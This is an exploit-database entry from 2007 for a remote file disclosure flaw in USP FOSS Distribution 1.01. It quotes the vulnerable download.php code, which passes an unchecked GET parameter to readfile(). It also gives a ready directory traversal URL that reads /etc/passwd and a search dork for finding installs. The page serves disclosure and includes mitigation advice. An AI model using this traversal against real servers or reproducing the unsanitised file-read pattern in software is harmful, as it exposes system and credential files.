header-logo
Suggest Exploit
vendor:
USP FOSS Distribution
by:
GolD_M = [Mahmood_ali]
5.5
CVSS
MEDIUM
Remote File Disclosure
CWE
Product Name: USP FOSS Distribution
Affected Version From: 01.01
Affected Version To: 01.01
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

USP FOSS Distribution 1.01 Remote File Disclosure

The vulnerability exists in the /user/download.php script of the USP FOSS Distribution 1.01. By manipulating the 'dnld' parameter, an attacker can disclose arbitrary files from the system, such as /etc/passwd.

Mitigation:

The vendor should validate and sanitize user input to prevent directory traversal attacks. Additionally, it is recommended to restrict access to sensitive files on the server.
Source

Exploit-DB raw data:

# USP FOSS Distribution 1.01(download.php dnld)Remote File Disclosure
# D.Script: http://norcalvex.org/pagode/uspfoss_v1_01.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Dork:intitle:USP FOSS Distribution
# V.Code In /user/download.php:
###################/user/download.php###################
#  <?
#  $file = @$_GET['dnld'];<----[+]
#  header('Content-Description: File Transfer');
#  header('Content-Type: application/force-download');
#  header('Content-Length: ' . filesize($file));
#  header('Content-Disposition: attachment; filename=' . basename($file));
#  readfile($file); <----[+]
#  ?>
########################################################
# Exploit:[Path_USP FOSS]/user/download.php?dnld=../../../../../../etc/passwd
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group & bd0rk

# milw0rm.com [2007-04-24]